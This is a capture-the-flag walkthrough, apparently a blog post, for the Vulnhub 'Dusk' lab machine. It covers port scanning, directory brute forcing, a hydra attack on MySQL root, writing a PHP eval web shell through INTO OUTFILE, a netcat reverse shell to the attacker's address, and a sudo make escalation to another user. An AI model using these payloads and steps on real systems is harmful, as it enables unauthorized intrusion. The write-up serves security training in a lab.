Dusk
Identify the target host's IP address
┌──(kali㉿kali)-[~/Vulnhub/Dusk]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: Finished! | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:0a 1 60 Unknown vendor
192.168.56.100 08:00:27:02:3b:33 1 60 PCS Systemtechnik GmbH
192.168.56.208 08:00:27:b6:83:b3 1 60 PCS Systemtechnik GmbH
Using netdiscover, which ships with Kali Linux, the target host's IP address is identified as 192.168.56.208 (the other two hosts are the VirtualBox host-only adapter and its DHCP server).
Nmap scan
┌──(kali㉿kali)-[~/Vulnhub/Dusk]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.208 -oN nmap_full_scan
Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-12 08:51 EST
Nmap scan report for 192.168.56.208
Host is up (0.00026s latency).
Not shown: 65529 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp pyftpdlib 1.5.5
| ftp-syst:
| STAT:
| FTP server status:
| Connected to: 192.168.56.208:21
| Waiting for username.
| TYPE: ASCII; STRUcture: File; MODE: Stream
| Data connection closed.
|_End of status.
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
| ssh-hostkey:
| 2048 b5ff692a03fd6d04ed2a06aabfb26a7c (RSA)
| 256 0b6f20d67c6c84bed8406169a2c6e88a (ECDSA)
|_ 256 85ff47d99250cbf7446cb4f45ce91ced (ED25519)
25/tcp open smtp Postfix smtpd
|_smtp-commands: dusk.dusk, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, CHUNKING
| ssl-cert: Subject: commonName=dusk.dusk
| Subject Alternative Name: DNS:dusk.dusk
| Not valid before: 2019-11-27T21:09:14
|_Not valid after: 2029-11-24T21:09:14
|_ssl-date: TLS randomness does not represent time
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-title: Apache2 Debian Default Page: It works
|_http-server-header: Apache/2.4.38 (Debian)
3306/tcp open mysql MySQL 5.5.5-10.3.18-MariaDB-0+deb10u1
| mysql-info:
| Protocol: 10
| Version: 5.5.5-10.3.18-MariaDB-0+deb10u1
| Thread ID: 37
| Capabilities flags: 63486
| Some Capabilities: DontAllowDatabaseTableColumn, ODBCClient, FoundRows, Support41Auth, IgnoreSpaceBeforeParenthesis, InteractiveClient, Speaks41ProtocolOld, SupportsTransactions, SupportsCompression, IgnoreSigpipes, ConnectWithDatabase, LongColumnFlag, Speaks41ProtocolNew, SupportsLoadDataLocal, SupportsMultipleResults, SupportsMultipleStatments, SupportsAuthPlugins
| Status: Autocommit
| Salt: \F'/U@~}xbcL/EP?.d1e
|_ Auth Plugin Name: mysql_native_password
8080/tcp open http PHP cli server 5.5 or later (PHP 7.3.11-1)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-open-proxy: Proxy might be redirecting requests
MAC Address: 08:00:27:B6:83:B3 (Oracle VirtualBox virtual NIC)
Service Info: Host: dusk.dusk; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.87 seconds
Getting a shell
Port 3306
Check for weak credentials (the first attempt below uses the password "root", the second an empty password)
┌──(kali㉿kali)-[~/Vulnhub/Dusk]
└─$ mysql -uroot -p -h 192.168.56.208
Enter password:
ERROR 1045 (28000): Access denied for user 'root'@'192.168.56.206' (using password: YES)
┌──(kali㉿kali)-[~/Vulnhub/Dusk]
└─$ mysql -uroot -p -h 192.168.56.208
Enter password:
ERROR 1045 (28000): Access denied for user 'root'@'192.168.56.206' (using password: NO)
Port 21
┌──(kali㉿kali)-[~/Vulnhub/Dusk]
└─$ ftp 192.168.56.208
Connected to 192.168.56.208.
220 pyftpdlib 1.5.5 ready.
Name (192.168.56.208:kali): anonymous
331 Username ok, send password.
Password:
530 Anonymous access not allowed.
ftp: Login failed
ftp> quit
221 Goodbye.
┌──(kali㉿kali)-[~/Vulnhub/Dusk]
└─$ searchsploit pyftpdlib 1.5.5
Exploits: No Results
Shellcodes: No Results
- Anonymous access is not allowed
- searchsploit knows no exploit for this FTP server version (pyftpdlib 1.5.5)
Port 80
┌──(kali㉿kali)-[~/Vulnhub/Dusk]
└─$ nikto -h http://192.168.56.208
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.208
+ Target Hostname: 192.168.56.208
+ Target Port: 80
+ Start Time: 2023-01-12 08:56:00 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.38 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server may leak inodes via ETags, header found with file /, inode: 29cd, size: 598295a712980, mtime: gzip
+ Allowed HTTP Methods: POST, OPTIONS, HEAD, GET
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7915 requests: 0 error(s) and 6 item(s) reported on remote host
+ End Time: 2023-01-12 08:56:48 (GMT-5) (48 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
┌──(kali㉿kali)-[~/Vulnhub/Dusk]
└─$ gobuster dir -u http://192.168.56.208 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.208
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Timeout: 10s
===============================================================
2023/01/12 08:58:00 Starting gobuster in directory enumeration mode
===============================================================
/javascript (Status: 301) [Size: 321] [--> http://192.168.56.208/javascript/]
/server-status (Status: 403) [Size: 279]
Progress: 219400 / 220561 (99.47%)
===============================================================
2023/01/12 08:58:26 Finished
===============================================================
┌──(kali㉿kali)-[~/Vulnhub/Dusk]
└─$ gobuster dir -u http://192.168.56.208 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.txt,.sh,.js
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.208
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Extensions: php,html,txt,sh,js
[+] Timeout: 10s
===============================================================
2023/01/12 08:59:49 Starting gobuster in directory enumeration mode
===============================================================
/.php (Status: 403) [Size: 279]
/.html (Status: 403) [Size: 279]
/index.html (Status: 200) [Size: 10701]
/javascript (Status: 301) [Size: 321] [--> http://192.168.56.208/javascript/]
/.php (Status: 403) [Size: 279]
/.html (Status: 403) [Size: 279]
/server-status (Status: 403) [Size: 279]
Progress: 1321074 / 1323366 (99.83%)
===============================================================
2023/01/12 09:02:36 Finished
===============================================================
┌──(kali㉿kali)-[~/Vulnhub/Dusk]
└─$ dirb http://192.168.56.208
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Thu Jan 12 09:03:27 2023
URL_BASE: http://192.168.56.208/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.56.208/ ----
+ http://192.168.56.208/index.html (CODE:200|SIZE:10701)
==> DIRECTORY: http://192.168.56.208/javascript/
+ http://192.168.56.208/server-status (CODE:403|SIZE:279)
---- Entering directory: http://192.168.56.208/javascript/ ----
==> DIRECTORY: http://192.168.56.208/javascript/jquery/
---- Entering directory: http://192.168.56.208/javascript/jquery/ ----
+ http://192.168.56.208/javascript/jquery/jquery (CODE:200|SIZE:271809)
-----------------
END_TIME: Thu Jan 12 09:03:31 2023
DOWNLOADED: 13836 - FOUND: 3
The scans of port 80 turned up nothing of value: only the Apache default page and its bundled jQuery.
Port 8080
┌──(kali㉿kali)-[~/Vulnhub/Dusk]
└─$ nikto -h http://192.168.56.208:8080
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.208
+ Target Hostname: 192.168.56.208
+ Target Port: 8080
+ Start Time: 2023-01-12 09:04:02 (GMT-5)
---------------------------------------------------------------------------
+ Server: No banner retrieved
+ Retrieved x-powered-by header: PHP/7.3.11-1~deb10u1
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ OSVDB-18114: /reports/rwservlet?server=repserv+report=/tmp/hacker.rdf+destype=cache+desformat=PDF: Oracle Reports rwservlet report Variable Arbitrary Report Executable Execution
+ ERROR: Error limit (20) reached for host, giving up. Last error: error reading HTTP response
+ Scan terminated: 20 error(s) and 5 item(s) reported on remote host
+ End Time: 2023-01-12 09:04:15 (GMT-5) (13 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
┌──(kali㉿kali)-[~/Vulnhub/Dusk]
└─$ gobuster dir -u http://192.168.56.208:8080 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.txt,.sh,.js
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.208:8080
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Extensions: html,txt,sh,js,php
[+] Timeout: 10s
===============================================================
2023/01/12 09:06:32 Starting gobuster in directory enumeration mode
===============================================================
Error: the server returns a status code that matches the provided options for non existing urls. http://192.168.56.208:8080/9017c201-9961-4795-ad75-f9c8e97668ec => 200 (Length: 257). To continue please exclude the status code or the length
┌──(kali㉿kali)-[~/Vulnhub/Dusk]
└─$ gobuster dir -u http://192.168.56.208:8080 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.txt,.sh,.js --exclue-length 257
Error: unknown flag: --exclue-length
┌──(kali㉿kali)-[~/Vulnhub/Dusk]
└─$ gobuster dir -u http://192.168.56.208:8080 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.txt,.sh,.js --exclude-length 257
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.208:8080
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] Exclude Length: 257
[+] User Agent: gobuster/3.3
[+] Extensions: html,txt,sh,js,php
[+] Timeout: 10s
===============================================================
2023/01/12 09:06:48 Starting gobuster in directory enumeration mode
===============================================================
/21540 (Status: 200) [Size: 340]
/head_02 (Status: 200) [Size: 340]
/PublicEducation (Status: 200) [Size: 340]
/play-poker (Status: 200) [Size: 340]
Progress: 1322766 / 1323366 (99.95%)
===============================================================
2023/01/12 09:19:12 Finished
===============================================================
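The server on port 8080 answered 200 with a 257-byte body for every non-existent path, which is why the first gobuster run refused to start, why --exclude-length 257 was needed, and why nikto's "Oracle Reports" hit is a false positive (nikto only saw a 200). The following is an added example, not code from the original write-up: it runs a constructed stand-in for such a catch-all server on localhost (its paths and bodies are hypothetical) and shows the baseline-then-filter logic that --exclude-length implements, including the failure mode where the catch-all body is not uniform and a fixed length cannot be excluded.

```python
"""Baseline-then-filter brute force against a catch-all web server.

Added example. The HTTP server below is a constructed stand-in for the PHP
CLI server on :8080; REAL_PATHS and the two bodies are hypothetical.
"""
import threading
import uuid
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.error import HTTPError
from urllib.request import ProxyHandler, build_opener

# Constructed sample site: these paths exist, every other path falls through.
REAL_PATHS = {"/21540", "/head_02", "/PublicEducation", "/play-poker"}
REAL_BODY = b"<html><body>listing of a real directory</body></html>"
CATCHALL_BODY = b"<html><body>fallback served for any path</body></html>"


class CatchAllHandler(BaseHTTPRequestHandler):
    """Answers 200 to every GET, as the target's port 8080 did."""

    def do_GET(self):
        body = REAL_BODY if self.path in REAL_PATHS else CATCHALL_BODY
        self.send_response(200)
        self.send_header("Content-Type", "text/html")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):  # keep the demo quiet
        pass


def start_server():
    """Start the stand-in server on a free localhost port; returns (server, base_url)."""
    srv = HTTPServer(("127.0.0.1", 0), CatchAllHandler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, "http://127.0.0.1:%d" % srv.server_address[1]


# Ignore any HTTP_PROXY in the environment so localhost requests go direct.
_opener = build_opener(ProxyHandler({}))


def signature(base_url, path):
    """(status, body length) of a response; 4xx/5xx are signatures too, not errors."""
    try:
        with _opener.open(base_url + path, timeout=5) as resp:
            return resp.status, len(resp.read())
    except HTTPError as err:
        return err.code, len(err.read())


def learn_baseline(base_url, samples=3):
    """Request random paths that cannot exist and record what 'not found' looks like."""
    sigs = {signature(base_url, "/" + uuid.uuid4().hex) for _ in range(samples)}
    if len(sigs) != 1:
        # The body size varies per request (e.g. the path is echoed back), so a
        # fixed exclude-length would not work and a fuzzier comparison is needed.
        raise RuntimeError("catch-all responses are not uniform: %r" % sigs)
    return sigs.pop()


def brute_force(base_url, wordlist):
    """Return (baseline, hits): paths whose response differs from the catch-all."""
    baseline = learn_baseline(base_url)
    hits = {}
    for word in wordlist:
        path = "/" + word
        sig = signature(base_url, path)
        if sig != baseline:
            hits[path] = sig
    return baseline, hits


if __name__ == "__main__":
    server, base = start_server()
    words = ["21540", "head_02", "PublicEducation", "play-poker", "admin", "backup"]
    baseline, found = brute_force(base, words)
    print("catch-all signature:", baseline)
    for p, s in sorted(found.items()):
        print(p, s)
    server.shutdown()
```

Comparing (status, length) against a learned baseline is exactly what gobuster's --exclude-length does after you read the length off its error message; sampling several random paths first is the check that tells you whether that filter is even applicable before you spend ten minutes on a 1.3 million-request run.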
Looking at other people's write-ups, the approach is to brute-force the MySQL password (a bit unusual, haha)
┌──(kali㉿kali)-[~/Vulnhub/Dusk]
└─$ hydra -l root -P /usr/share/wordlists/rockyou.txt mysql://192.168.56.208
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-01-12 09:20:25
[INFO] Reduced number of tasks to 4 (mysql does not like many parallel connections)
[DATA] max 4 tasks per 1 server, overall 4 tasks, 14344399 login tries (l:1/p:14344399), ~3586100 tries per task
[DATA] attacking mysql://192.168.56.208:3306/
[3306][mysql] host: 192.168.56.208 login: root password: password
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-01-12 09:20:28
So MySQL does have a weak password after all; the manual attempts earlier only tried the empty password and "root", and "password" should have been tried as well (it sits near the top of rockyou.txt, which is why hydra finished in three seconds).
The page served on port 8080 (http://192.168.56.208:8080/) reveals that the PHP CLI server's working directory, and therefore its document root, is /var/tmp, so a one-line PHP web shell can be dropped there with MySQL's INTO OUTFILE. This only succeeds because the MySQL root account holds the FILE privilege, secure_file_priv does not restrict the destination, and the mysqld process can write to /var/tmp; check SHOW VARIABLES LIKE 'secure_file_priv' first if the write fails. Note that the shell takes its command from an unauthenticated GET parameter, so anyone who finds 1.php can use it:
┌──(kali㉿kali)-[~/Vulnhub/Dusk]
└─$ mysql -uroot -p -h 192.168.56.208
Enter password:
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 55
Server version: 10.3.18-MariaDB-0+deb10u1 Debian 10
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB [(none)]> select "<?php eval($_GET['cmd']);?>" into outfile "/var/tmp/1.php";
Query OK, 1 row affected (0.000 sec)
MariaDB [(none)]>
Request 1.php with the cmd parameter to spawn a reverse shell (this payload relies on the target's netcat build supporting -e, which it does here):
http://192.168.56.208:8080/1.php?cmd=system(%27nc%20-e%20/bin/bash%20192.168.56.206%205555%27);
┌──(kali㉿kali)-[~/Vulnhub/Dusk]
└─$ sudo nc -nlvp 5555
[sudo] password for kali:
listening on [any] 5555 ...
connect to [192.168.56.206] from (UNKNOWN) [192.168.56.208] 46350
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
which python
/usr/bin/python
python -c 'import pty;pty.spawn("/bin/bash")'
www-data@dusk:/var/tmp$
Privilege escalation
www-data@dusk:/home$ sudo -l
Matching Defaults entries for www-data on dusk:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User www-data may run the following commands on dusk:
    (dusk) NOPASSWD: /usr/bin/ping, /usr/bin/make, /usr/bin/sl
www-data@dusk:/home$ COMMAND='/bin/sh'
www-data@dusk:/home$ sudo -u dusk /usr/bin/make -s --eval=$'x:\n\t-'"$COMMAND"
$ id
uid=1000(dusk) gid=1000(dusk) groups=1000(dusk),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),111(bluetooth),115(lpadmin),116(scanner),123(docker)
$
The shell now runs as dusk: --eval feeds make a one-target makefile whose recipe is /bin/sh, and because sudo executes make as dusk, the spawned shell inherits that user (the leading '-' in the recipe only tells make to ignore the command's exit status). dusk is a member of the docker group (gid 123), which is what the next step relies on.
Next, the docker group membership is used to escalate to root.
Tags: http, Dusk, kali, 192.168, Vulnhub, target machine, 56.208, usr
From: https://www.cnblogs.com/jason-huawen/p/17048186.html